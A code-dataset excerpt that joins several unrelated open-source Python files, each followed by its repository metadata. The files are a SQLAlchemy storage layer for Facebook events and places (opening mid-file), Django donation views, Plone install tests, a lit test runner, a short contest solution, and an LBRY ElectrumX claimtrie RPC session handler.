name = sqlalchemy.Column(sqlalchemy.String(100))
places = relationship('Place', secondary=place_topic)
@validates('name')
def validate_trunc(self, key, value):
max_len = getattr(self.__class__, key).prop.columns[0].type.length
if value and len(value) > max_len:
return value[:max_len]
return value
def __init__(self, id, name):
self.id = id
self.name = name
class Place(Base):
__tablename__ = 'Place'
@classmethod
def from_dict(cls, place_dict):
place_loc = place_dict.get('location', {})
topic_list = []
if place_dict.get('place_dict_topics'):
topic_list = [Topic.from_dict(topic_dict)
for topic_dict
in place_dict['place_dict_topics'].get('data')]
return cls(id=place_dict['id'],
topics=topic_list,
ptype=place_dict.get('place_dict_type', 'UNKNOWN'),
name=place_dict.get('name', 'Unnamed'),
city=place_loc.get('city', 'Wroclaw'),
country=place_loc.get('country', 'Poland'),
lat=place_loc.get('latitude', 0.0),
lon=place_loc.get('longitude', 0.0),
street=place_loc.get('street', 'Unknown'),
zip=place_loc.get('zip', '00-000'))
def to_json(self):
return json.dumps(
self.to_dict(),
default=default_json_serializer,
separators=(',', ':'),
)
def to_dict(self):
# IDEA: Add events=T/F flag?
# IDEA: Auto-generate fields?
return {
'id': self.id,
'name': self.name,
'ptype': self.ptype,
'topics': [topic.to_dict() for topic in self.topics],
'city': self.city,
'country': self.country,
'lat': self.lat,
'lon': self.lon,
'street': self.street,
'zip': self.zip,
}
id = sqlalchemy.Column(sqlalchemy.String(200), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String(100))
ptype = sqlalchemy.Column(sqlalchemy.String(10))
city = sqlalchemy.Column(sqlalchemy.String(25))
country = sqlalchemy.Column(sqlalchemy.String(25))
lat = sqlalchemy.Column(sqlalchemy.Float())
lon = sqlalchemy.Column(sqlalchemy.Float())
street = sqlalchemy.Column(sqlalchemy.String(100))
topics = relationship('Topic', secondary=place_topic, cascade='save-update')
zip = sqlalchemy.Column(sqlalchemy.String(6))
@validates('name', 'ptype', 'street', 'country', 'zip')
def validate_trunc(self, key, value):
max_len = getattr(self.__class__, key).prop.columns[0].type.length
if value and len(value) > max_len:
return value[:max_len]
return value
def __init__(self, id, name, topics, ptype, city, country, lat, lon, street,
zip):
self.id = id
self.name = name
self.ptype = ptype
self.topics = topics
self.city = city
self.country = country
self.lat = lat
self.lon = lon
self.street = street
self.zip = zip
def __repr__(self):
return '<Place {} - {}>'.format(self.id, self.name)
def __str__(self):
return '<Place {} - {}>'.format(self.id, self.name)
class Event(Base):
__tablename__ = 'Event'
@classmethod
def from_dict(cls, event_dict):
return cls(
id=event_dict['id'],
desc=event_dict.get('description', 'None'),
name=event_dict['name'],
picture_url=event_dict.get('picture', {})
.get('data', {}).get('url', 'None'),
ticket_url=event_dict.get('ticket_uri', 'None'),
place_id=event_dict.get['place_id'],
start_time=dateutil.parser.parse(
event_dict.get(
'start_time',
'2017-04-07T16:00:00+0200',
)),
)
def to_json(self):
return json.dumps(
self.to_dict(),
default=default_json_serializer,
separators=(',', ':'),
)
def to_dict(self):
return {
'id': self.id,
'name': self.name,
'description': self.description,
'start_time': self.start_time,
'place_id': self.place_id,
'picture_url': self.picture_url,
'ticket_url': self.ticket_url,
}
id = sqlalchemy.Column(sqlalchemy.String(200), primary_key=True)
description = sqlalchemy.Column(sqlalchemy.String(10000))
name = sqlalchemy.Column(sqlalchemy.String(100))
picture_url = sqlalchemy.Column(sqlalchemy.String(150))
ticket_url = sqlalchemy.Column(sqlalchemy.String(150))
start_time = sqlalchemy.Column(sqlalchemy.DateTime)
place_id = sqlalchemy.Column(
sqlalchemy.String(50), sqlalchemy.ForeignKey('Place.id'))
place = relationship('Place', backref='events', foreign_keys=[place_id])
@validates('description', 'name')
def validate_trunc(self, key, value):
max_len = getattr(self.__class__, key).prop.columns[0].type.length
if value and len(value) > max_len:
return value[:max_len]
return value
@validates('picture_url', 'ticket_url')
def validate_strict(self, key, value):
max_len = getattr(self.__class__, key).prop.columns[0].type.length
if value and len(value) > max_len:
return 'None'
return value
def __init__(self, id, desc, name, picture_url, ticket_url, start_time,
place_id):
self.id = id
self.name = name
self.description = desc
self.start_time = start_time
self.place_id = place_id
self.picture_url = picture_url
self.ticket_url = ticket_url
def __repr__(self):
return '<Event {} - {}>\n{}'.format(self.id, self.name,
pprint.pformat(self.to_dict()))
def __str__(self):
return pprint.pformat(self.to_dict())
# TODO: Implement 'Page' class
# class Page(Base):
# __tablename__ = 'Page'
# id = sqlalchemy.Column(sqlalchemy.String(50), primary_key=True)
# message = sqlalchemy.Column(sqlalchemy.String(10000))
# link = sqlalchemy.Column(sqlalchemy.String(150))
# created_time = sqlalchemy.Column(sqlalchemy.DateTime)
#
# like = sqlalchemy.Column(sqlalchemy.Integer())
# love = sqlalchemy.Column(sqlalchemy.Integer())
# haha = sqlalchemy.Column(sqlalchemy.Integer())
# wow = sqlalchemy.Column(sqlalchemy.Integer())
# sad = sqlalchemy.Column(sqlalchemy.Integer())
# angry = sqlalchemy.Column(sqlalchemy.Integer())
# thankful = sqlalchemy.Column(sqlalchemy.Integer())
#
# page_id = sqlalchemy.Column(sqlalchemy.String(50), sqlalchemy.ForeignKey('Page.id'))
# page = relationship('Page', backref='posts', foreign_keys=[page_id])
#
# @validates('message')
# def validate_trunc(self, key, value):
# max_len = getattr(self.__class__, key).prop.columns[0].type.length
# if value and len(value) > max_len:
# return value[:max_len]
# return value
#
# @validates('link')
# def validate_strict(self, key, value):
# max_len = getattr(self.__class__, key).prop.columns[0].type.length
# if value and len(value) > max_len:
# return 'None'
# return value
#
# def __init__(self, id, page_id, message, link, created_time, like, love, haha, wow, sad, angry, thankful):
# self.id = id
# self.message = message
# self.page_id = page_id
# self.message = message
# self.link = link
# self.created_time = created_time
# self.like = like
# self.love = love
# self.haha = haha
# self.wow = wow
# self.sad = sad
# self.angry = angry
# self.thankful = thankful
#
# def __repr__(self):
# return '<Post {} - {}>'.format(self.id, self.message[:25])
#
# def __str__(self):
# return '<Post {} - {}>'.format(self.id, self.message[:25])
# TODO: Implement 'Post' class
# class Post(Base):
# __tablename__ = 'Post'
# id = sqlalchemy.Column(sqlalchemy.String(50), primary_key=True)
# message = sqlalchemy.Column(sqlalchemy.String(10000))
# link = sqlalchemy.Column(sqlalchemy.String(150))
# created_time = sqlalchemy.Column(sqlalchemy.DateTime)
#
# like = sqlalchemy.Column(sqlalchemy.Integer())
# love = sqlalchemy.Column(sqlalchemy.Integer())
# haha = sqlalchemy.Column(sqlalchemy.Integer())
# wow = sqlalchemy.Column(sqlalchemy.Integer())
# sad = sqlalchemy.Column(sqlalchemy.Integer())
# angry = sqlalchemy.Column(sqlalchemy.Integer())
# thankful = sqlalchemy.Column(sqlalchemy.Integer())
#
# page_id = sqlalchemy.Column(sqlalchemy.String(
# 50), sqlalchemy.ForeignKey('Page.id'))
# page = relationship('Page', backref='posts', foreign_keys=[page_id])
#
# @validates('message')
# def validate_trunc(self, key, value):
# max_len = getattr(self.__class__, key).prop.columns[0].type.length
# if value and len(value) > max_len:
# return value[:max_len]
# return value
#
# @validates('link')
# def validate_strict(self, key, value):
# max_len = getattr(self.__class__, key).prop.columns[0].type.length
# if value and len(value) > max_len:
# return 'None'
# return value
#
# def __init__(self, id, page_id, message, link, created_time, like, love, haha, wow, sad, angry, thankful):
# self.id = id
# self.message = message
# self.page_id = page_id
# self.link = link
# self.created_time = created_time
# self.like = like
# self.love = love
# self.haha = haha
# self.wow = wow
# self.sad = sad
# self.angry = angry
# self.thankful = thankful
#
# def __repr__(self):
# return '<Post {} - {}>'.format(self.id, self.message[:25])
#
# def __str__(self):
# return '<Post {} - {}>'.format(self.id, self.message[:25])
#
#
class Storage:
def __init__(self, db_url='sqlite:///db/fb.sqlite'):
self.db = sqlalchemy.create_engine(db_url)
try:
Base.metadata.create_all(self.db)
except Exception as e:
logging.debug(e)
pass
session = scoped_session(sessionmaker(bind=self.db))
self.session_factory = session
self.session = self.session_factory()
def __del__(self):
self.session_factory.remove()
def save_eventlist(self, eventlist, commit=True):
try:
eventlist = [Event.from_dict(event_dict)
for event_dict in eventlist]
self.session.bulk_save_objects(eventlist)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_eventlist: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_eventlist: {e}')
def save_placelist(self, placelist, commit=True):
try:
placelist = [Place.from_dict(pdict)
for pdict in placelist]
self.session.bulk_save_objects(placelist)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_placelist: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_placelist: {e}')
def save_topiclist(self, topiclist, commit=True):
try:
topiclist = [Topic.from_dict(topic_dict)
for topic_dict in topiclist]
self.session.bulk_save_objects(topiclist)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_topiclist: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_topiclist: {e}')
def save_event(self, event_dict, commit=True):
try:
event = Event.from_dict(event_dict)
self.session.add(event)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_event: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_event: {e}')
def save_topic(self, topic_dict, commit=True):
try:
if self.topic_exists(topic_dict.get('id')):
return self.get_topic(topic_dict.get('id'))
topic = Topic.from_dict(topic_dict)
self.session.add(topic)
if commit:
self.session.commit()
return topic
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_topic: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_topic: {e}')
def save_place(self, place_dict, commit=True):
try:
place = Place.from_dict(place_dict)
self.session.add(place)
if commit:
self.session.commit()
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.save_place: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.save_place: {e}')
def update_place(self, place, commit=True):
# TODO: update and use session.merge
logging.debug(f'Storage: update_place request, place = {place}')
try:
# IDEA: Move this to the place class and pass in a string list
if self.place_exists(place['id']):
place_loc = place.get('location', {})
topic_list = []
if place.get('place_topics', None):
for topic in place['place_topics'].get('data'):
topic_list.append(
Topic.from_dict({
'name': topic['name'],
'id': topic['id']
}))
old_place = self.get_place(place['id'])
old_place.topics = topic_list
old_place.ptype = place.get('place_type', 'UNKNOWN')
old_place.name = place['name']
old_place.city = place_loc.get('city')
old_place.country = place_loc.get('country')
old_place.lat = place_loc['latitude']
old_place.lon = place_loc['longitude']
old_place.street = place_loc.get('street')
old_place.zip = place_loc.get('zip')
if commit:
self.session.commit()
return old_place
else:
return self.save_place(place, commit)
except sqlalchemy.exc.IntegrityError as e:
logging.debug(f'Storage.update_place: {e}')
self.session.rollback()
except Exception as e:
self.session.rollback()
logging.exception(f'Storage.update_place: {e}')
def save_post(self):
pass
def save_page(self):
pass
def get_all_place_ids(self):
return [id[0] for id in self.session.query(Place.id).all()]
def get_all_event_ids(self):
return [id[0] for id in self.session.query(Event.id).all()]
def get_all_topic_ids(self):
return [id[0] for id in self.session.query(Topic.id).all()]
def get_place(self, place_id):
return self.session.query(Place).filter_by(id=place_id).scalar()
def get_topic(self, topic_id):
return self.session.query(Topic).filter_by(id=topic_id).scalar()
def topic_exists(self, topic_id):
return (True if self.session.query(Topic.id).filter_by(
id=topic_id).scalar() is not None else False)
def place_exists(self, place_id):
return (True if self.session.query(Place.id).filter_by(
id=place_id).scalar() is not None else False)
def get_event(self, event_id):
return self.session.query(Event).filter_by(id=event_id).scalar()
def event_exists(self, event_id):
return (True if self.session.query(Event.id).filter_by(
id=event_id).scalar() is not None else False)
def get_events_coords(self, lat, lon, distance=2000,
date=datetime.datetime.today()):
dlat = fbd.tools.lat_from_met(distance)
dlon = fbd.tools.lon_from_met(distance)
# Get the circle
left, right = lon - dlon, lon + dlon
bottom, top = lat - dlat, lat + dlat
places = (self.session.query(Place).filter(Place.lat >= bottom)
.filter(Place.lat <= top).filter(Place.lon >= left)
.filter(Place.lon <= right).all())
events = [
event.to_dict() for place in places for event in place.events
if event.start_time > date
]
return events
def get_places_coords(self, lat, lon, distance=2000):
dlat = fbd.tools.lat_from_met(distance)
dlon = fbd.tools.lon_from_met(distance)
# Get the circle
left, right = lon - dlon, lon + dlon
bottom, top = lat - dlat, lat + dlat
places = (self.session.query(Place).filter(Place.lat >= bottom)
.filter(Place.lat <=
top).filter(Place.lon >=
left).filter(Place.lon <= right).all())
return places
if __name__ == '__main__':
s = Storage()
pprint.pprint(s.get_events_coords(51.1, 17.01))
|
olety/FBD
|
fbd/storage.py
|
Python
|
mit
| 19,799
|
from django.http import HttpResponse
from django.views.generic import TemplateView, DetailView
from django.views.generic.edit import FormView
from .forms import DonationForm
from .models import CardType
import json
class PagoView(FormView):
form_class = DonationForm
template_name = 'pago.html'
success_url = 'http://funsepa.org/cms/es/gracias/'
def get_context_data(self, **kwargs):
context = super(PagoView, self).get_context_data(**kwargs)
david = self.request.GET.get('david', None)
navidad = self.request.GET.get('navidad', None)
if david:
context['david'] = True
if navidad:
context['navidad'] = True
return context
def form_valid(self, form):
instance = super(PagoView, self).form_valid(form)
return instance
class PagoDone(TemplateView):
template_name = 'done.html'
class CardTypeView(DetailView):
model = CardType
slug_field = 'card_type'
def get(self, *args, **kwargs):
card_type = CardType.objects.filter(card_type=kwargs.pop('slug')).first()
if card_type:
response = {
'id': card_type.id,
'card_type': card_type.card_type,
'name': card_type.alias}
else:
response = None
return HttpResponse(json.dumps(response))
|
FUNSEPA/fsp-paypal
|
pagos/views.py
|
Python
|
mit
| 1,361
|
# -*- coding: utf-8 -*-
"""Setup/installation tests for this package."""
from ade25.assetmanager.testing import IntegrationTestCase
from plone import api
class TestInstall(IntegrationTestCase):
"""Test installation of ade25.assetmanager into Plone."""
def setUp(self):
"""Custom shared utility setup for tests."""
self.portal = self.layer['portal']
self.installer = api.portal.get_tool('portal_quickinstaller')
def test_product_installed(self):
"""Test if ade25.assetmanager is installed with portal_quickinstaller."""
self.assertTrue(self.installer.isProductInstalled('ade25.assetmanager'))
def test_uninstall(self):
"""Test if ade25.assetmanager is cleanly uninstalled."""
self.installer.uninstallProducts(['ade25.assetmanager'])
self.assertFalse(self.installer.isProductInstalled('ade25.assetmanager'))
# browserlayer.xml
def test_browserlayer(self):
"""Test that IAde25AssetmanagerLayer is registered."""
from ade25.assetmanager.interfaces import IAde25AssetmanagerLayer
from plone.browserlayer import utils
self.failUnless(IAde25AssetmanagerLayer in utils.registered_layers())
|
ade25/ade25.assetmanager
|
ade25/assetmanager/tests/test_setup.py
|
Python
|
mit
| 1,209
|
#!/usr/bin/env python
# https://medium.com/@mshockwave/using-llvm-lit-out-of-tree-5cddada85a78
# To run lit-based test suite:
# cd xyz/qmlcore/test && ./lit.py -va .
from lit.main import main
import os
if __name__ == '__main__':
if not os.path.exists(".cache/core.Item"):
print("Note that first run may take quite a while .cache/core.* is populated...")
main()
|
pureqml/qmlcore
|
test/lit.py
|
Python
|
mit
| 381
|
s = input().rstrip()
print(s[:4],s[4:])
|
utgw/programming-contest
|
codefestival/2016/qualA/a.py
|
Python
|
mit
| 40
|
import math
import unicodedata as uda
from binascii import unhexlify, hexlify
from torba.rpc.jsonrpc import RPCError
from torba.server.hash import hash_to_hex_str
from torba.server.session import ElectrumX
from torba.server import util
from lbry.schema.result import Outputs
from lbry.schema.url import URL
from lbry.wallet.server.block_processor import LBRYBlockProcessor
from lbry.wallet.server.db import LBRYDB
class LBRYElectrumX(ElectrumX):
PROTOCOL_MIN = (0, 0) # temporary, for supporting 0.10 protocol
max_errors = math.inf # don't disconnect people for errors! let them happen...
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# fixme: this is a rebase hack, we need to go through ChainState instead later
self.daemon = self.session_mgr.daemon
self.bp: LBRYBlockProcessor = self.session_mgr.bp
self.db: LBRYDB = self.bp.db
def set_request_handlers(self, ptuple):
super().set_request_handlers(ptuple)
handlers = {
'blockchain.transaction.get_height': self.transaction_get_height,
'blockchain.claimtrie.search': self.claimtrie_search,
'blockchain.claimtrie.resolve': self.claimtrie_resolve,
'blockchain.claimtrie.getclaimbyid': self.claimtrie_getclaimbyid,
'blockchain.claimtrie.getclaimsforname': self.claimtrie_getclaimsforname,
'blockchain.claimtrie.getclaimsbyids': self.claimtrie_getclaimsbyids,
'blockchain.claimtrie.getvalue': self.claimtrie_getvalue,
'blockchain.claimtrie.getnthclaimforname': self.claimtrie_getnthclaimforname,
'blockchain.claimtrie.getclaimsintx': self.claimtrie_getclaimsintx,
'blockchain.claimtrie.getclaimssignedby': self.claimtrie_getclaimssignedby,
'blockchain.claimtrie.getclaimssignedbynthtoname': self.claimtrie_getclaimssignedbynthtoname,
'blockchain.claimtrie.getvalueforuri': self.claimtrie_getvalueforuri,
'blockchain.claimtrie.getvaluesforuris': self.claimtrie_getvalueforuris,
'blockchain.claimtrie.getclaimssignedbyid': self.claimtrie_getclaimssignedbyid,
'blockchain.block.get_server_height': self.get_server_height,
}
self.request_handlers.update(handlers)
async def claimtrie_search(self, **kwargs):
if 'claim_id' in kwargs:
self.assert_claim_id(kwargs['claim_id'])
return Outputs.to_base64(*self.db.sql.search(kwargs))
async def claimtrie_resolve(self, *urls):
return Outputs.to_base64(*self.db.sql.resolve(urls))
async def get_server_height(self):
return self.bp.height
async def transaction_get_height(self, tx_hash):
self.assert_tx_hash(tx_hash)
transaction_info = await self.daemon.getrawtransaction(tx_hash, True)
if transaction_info and 'hex' in transaction_info and 'confirmations' in transaction_info:
# an unconfirmed transaction from lbrycrdd will not have a 'confirmations' field
return (self.db.db_height - transaction_info['confirmations']) + 1
elif transaction_info and 'hex' in transaction_info:
return -1
return None
async def claimtrie_getclaimssignedby(self, name):
winning_claim = await self.daemon.getvalueforname(name)
if winning_claim:
return await self.claimtrie_getclaimssignedbyid(winning_claim['claimId'])
async def claimtrie_getclaimssignedbyid(self, certificate_id):
claim_ids = self.get_claim_ids_signed_by(certificate_id)
return await self.batched_formatted_claims_from_daemon(claim_ids)
def claimtrie_getclaimssignedbyidminimal(self, certificate_id):
claim_ids = self.get_claim_ids_signed_by(certificate_id)
ret = []
for claim_id in claim_ids:
raw_claim_id = unhexlify(claim_id)[::-1]
info = self.db.get_claim_info(raw_claim_id)
if info:
ret.append({
'claim_id': claim_id,
'height': info.height,
'name': info.name.decode()
})
return ret
def get_claim_ids_signed_by(self, certificate_id):
raw_certificate_id = unhexlify(certificate_id)[::-1]
raw_claim_ids = self.db.get_signed_claim_ids_by_cert_id(raw_certificate_id)
return list(map(hash_to_hex_str, raw_claim_ids))
async def claimtrie_getclaimssignedbynthtoname(self, name, n):
claim = self.claimtrie_getnthclaimforname(name, n)
if claim and 'claim_id' in claim:
return await self.claimtrie_getclaimssignedbyid(hash_to_hex_str(claim['claim_id']))
async def claimtrie_getclaimsintx(self, txid):
# TODO: this needs further discussion.
# Code on lbryum-server is wrong and we need to gather what we clearly expect from this command
claim_ids = [claim['claimId'] for claim in (await self.daemon.getclaimsfortx(txid)) if 'claimId' in claim]
return await self.batched_formatted_claims_from_daemon(claim_ids)
async def claimtrie_getvalue(self, name, block_hash=None):
proof = await self.daemon.getnameproof(name, block_hash)
result = {'proof': proof, 'supports': []}
if proof_has_winning_claim(proof):
tx_hash, nout = proof['txhash'], int(proof['nOut'])
transaction_info = await self.daemon.getrawtransaction(tx_hash, True)
result['transaction'] = transaction_info['hex'] # should have never included this (or the call to get it)
raw_claim_id = self.db.get_claim_id_from_outpoint(unhexlify(tx_hash)[::-1], nout)
claim_id = hexlify(raw_claim_id[::-1]).decode()
claim = await self.claimtrie_getclaimbyid(claim_id)
result.update(claim)
return result
async def claimtrie_getnthclaimforname(self, name, n):
n = int(n)
result = await self.claimtrie_getclaimsforname(name)
if 'claims' in result and len(result['claims']) > n >= 0:
# TODO: revist this after lbrycrd_#209 to see if we can sort by claim_sequence at this point
result['claims'].sort(key=lambda c: (int(c['height']), int(c['nout'])))
result['claims'][n]['claim_sequence'] = n
return result['claims'][n]
async def claimtrie_getpartialmatch(self, name, part):
result = await self.claimtrie_getclaimsforname(name)
if 'claims' in result:
return next(filter(lambda x: x['claim_id'].starts_with(part), result['claims']), None)
async def claimtrie_getclaimsforname(self, name):
claims = await self.daemon.getclaimsforname(name)
if claims:
claims['claims'] = [self.format_claim_from_daemon(claim, name) for claim in claims['claims']]
claims['supports_without_claims'] = [] # fixme temporary
del claims['supports without claims']
claims['last_takeover_height'] = claims['nLastTakeoverHeight']
del claims['nLastTakeoverHeight']
return claims
return {}
async def batched_formatted_claims_from_daemon(self, claim_ids):
claims = await self.daemon.getclaimsbyids(claim_ids)
result = []
for claim in claims:
if claim and claim.get('value'):
result.append(self.format_claim_from_daemon(claim))
return result
def format_claim_from_daemon(self, claim, name=None):
"""Changes the returned claim data to the format expected by lbry and adds missing fields."""
if not claim:
return {}
# this ISO-8859 nonsense stems from a nasty form of encoding extended characters in lbrycrd
# it will be fixed after the lbrycrd upstream merge to v17 is done
# it originated as a fear of terminals not supporting unicode. alas, they all do
if 'name' in claim:
name = claim['name'].encode('ISO-8859-1').decode()
info = self.db.sql.get_claims(claim_id=claim['claimId'])
if not info:
# raise RPCError("Lbrycrd has {} but not lbryumx, please submit a bug report.".format(claim_id))
return {}
address = info.address.decode()
# fixme: temporary
#supports = self.format_supports_from_daemon(claim.get('supports', []))
supports = []
amount = get_from_possible_keys(claim, 'amount', 'nAmount')
height = get_from_possible_keys(claim, 'height', 'nHeight')
effective_amount = get_from_possible_keys(claim, 'effective amount', 'nEffectiveAmount')
valid_at_height = get_from_possible_keys(claim, 'valid at height', 'nValidAtHeight')
result = {
"name": name,
"claim_id": claim['claimId'],
"txid": claim['txid'],
"nout": claim['n'],
"amount": amount,
"depth": self.db.db_height - height + 1,
"height": height,
"value": hexlify(claim['value'].encode('ISO-8859-1')).decode(),
"address": address, # from index
"supports": supports,
"effective_amount": effective_amount,
"valid_at_height": valid_at_height
}
if 'claim_sequence' in claim:
# TODO: ensure that lbrycrd #209 fills in this value
result['claim_sequence'] = claim['claim_sequence']
else:
result['claim_sequence'] = -1
if 'normalized_name' in claim:
result['normalized_name'] = claim['normalized_name'].encode('ISO-8859-1').decode()
return result
def format_supports_from_daemon(self, supports):
return [[support['txid'], support['n'], get_from_possible_keys(support, 'amount', 'nAmount')] for
support in supports]
async def claimtrie_getclaimbyid(self, claim_id):
self.assert_claim_id(claim_id)
claim = await self.daemon.getclaimbyid(claim_id)
return self.format_claim_from_daemon(claim)
async def claimtrie_getclaimsbyids(self, *claim_ids):
claims = await self.batched_formatted_claims_from_daemon(claim_ids)
return dict(zip(claim_ids, claims))
def assert_tx_hash(self, value):
'''Raise an RPCError if the value is not a valid transaction
hash.'''
try:
if len(util.hex_to_bytes(value)) == 32:
return
except Exception:
pass
raise RPCError(1, f'{value} should be a transaction hash')
def assert_claim_id(self, value):
'''Raise an RPCError if the value is not a valid claim id
hash.'''
try:
if len(util.hex_to_bytes(value)) == 20:
return
except Exception:
pass
raise RPCError(1, f'{value} should be a claim id hash')
def normalize_name(self, name):
# this is designed to match lbrycrd; change it here if it changes there
return uda.normalize('NFD', name).casefold()
def claim_matches_name(self, claim, name):
if not name:
return False
if 'normalized_name' in claim:
return self.normalize_name(name) == claim['normalized_name']
return name == claim['name']
async def claimtrie_getvalueforuri(self, block_hash, uri, known_certificates=None):
# TODO: this thing is huge, refactor
CLAIM_ID = "claim_id"
WINNING = "winning"
SEQUENCE = "sequence"
uri = uri
block_hash = block_hash
try:
parsed_uri = URL.parse(uri)
except ValueError as err:
return {'error': err.args[0]}
result = {}
if parsed_uri.has_channel:
certificate = None
# TODO: this is also done on the else, refactor
if parsed_uri.channel.claim_id:
if len(parsed_uri.channel.claim_id) < 40:
certificate_info = self.claimtrie_getpartialmatch(
parsed_uri.channel.name, parsed_uri.channel.claim_id)
else:
certificate_info = await self.claimtrie_getclaimbyid(parsed_uri.channel.claim_id)
if certificate_info and self.claim_matches_name(certificate_info, parsed_uri.channel.name):
certificate = {'resolution_type': CLAIM_ID, 'result': certificate_info}
elif parsed_uri.claim_sequence:
certificate_info = await self.claimtrie_getnthclaimforname(parsed_uri.name, parsed_uri.claim_sequence)
if certificate_info:
certificate = {'resolution_type': SEQUENCE, 'result': certificate_info}
else:
certificate_info = await self.claimtrie_getvalue(parsed_uri.name, block_hash)
if certificate_info:
certificate = {'resolution_type': WINNING, 'result': certificate_info}
if certificate and 'claim_id' not in certificate['result']:
return result
if certificate:
result['certificate'] = certificate
channel_id = certificate['result']['claim_id']
claims_in_channel = self.claimtrie_getclaimssignedbyidminimal(channel_id)
if not parsed_uri.path:
result['unverified_claims_in_channel'] = {claim['claim_id']: (claim['name'], claim['height'])
for claim in claims_in_channel}
else:
# making an assumption that there aren't case conflicts on an existing channel
norm_path = self.normalize_name(parsed_uri.path)
result['unverified_claims_for_name'] = {claim['claim_id']: (claim['name'], claim['height'])
for claim in claims_in_channel
if self.normalize_name(claim['name']) == norm_path}
else:
claim = None
if parsed_uri.claim_id:
if len(parsed_uri.claim_id) < 40:
claim_info = self.claimtrie_getpartialmatch(parsed_uri.name, parsed_uri.claim_id)
else:
claim_info = await self.claimtrie_getclaimbyid(parsed_uri.claim_id)
if claim_info and self.claim_matches_name(claim_info, parsed_uri.name):
claim = {'resolution_type': CLAIM_ID, 'result': claim_info}
elif parsed_uri.claim_sequence:
claim_info = await self.claimtrie_getnthclaimforname(parsed_uri.name, parsed_uri.claim_sequence)
if claim_info:
claim = {'resolution_type': SEQUENCE, 'result': claim_info}
else:
claim_info = await self.claimtrie_getvalue(parsed_uri.name, block_hash)
if claim_info:
claim = {'resolution_type': WINNING, 'result': claim_info}
if (claim and
# is not an unclaimed winning name
(claim['resolution_type'] != WINNING or proof_has_winning_claim(claim['result']['proof']))):
raw_claim_id = unhexlify(claim['result']['claim_id'])[::-1]
raw_certificate_id = self.db.get_claim_info(raw_claim_id).cert_id
if raw_certificate_id:
certificate_id = hash_to_hex_str(raw_certificate_id)
certificate = await self.claimtrie_getclaimbyid(certificate_id)
if certificate:
certificate = {'resolution_type': CLAIM_ID,
'result': certificate}
result['certificate'] = certificate
result['claim'] = claim
return result
async def claimtrie_getvalueforuris(self, block_hash, *uris):
MAX_BATCH_URIS = 500
if len(uris) > MAX_BATCH_URIS:
raise Exception("Exceeds max batch uris of {}".format(MAX_BATCH_URIS))
return {uri: await self.claimtrie_getvalueforuri(block_hash, uri) for uri in uris}
# TODO: get it all concurrently when lbrycrd pending changes goes into a stable release
#async def getvalue(uri):
# value = await self.claimtrie_getvalueforuri(block_hash, uri)
# return uri, value,
#return dict([await asyncio.gather(*tuple(getvalue(uri) for uri in uris))][0])
def proof_has_winning_claim(proof):
return {'txhash', 'nOut'}.issubset(proof.keys())
def get_from_possible_keys(dictionary, *keys):
for key in keys:
if key in dictionary:
return dictionary[key]
|
lbryio/lbry
|
lbry/lbry/wallet/server/session.py
|
Python
|
mit
| 16,685
|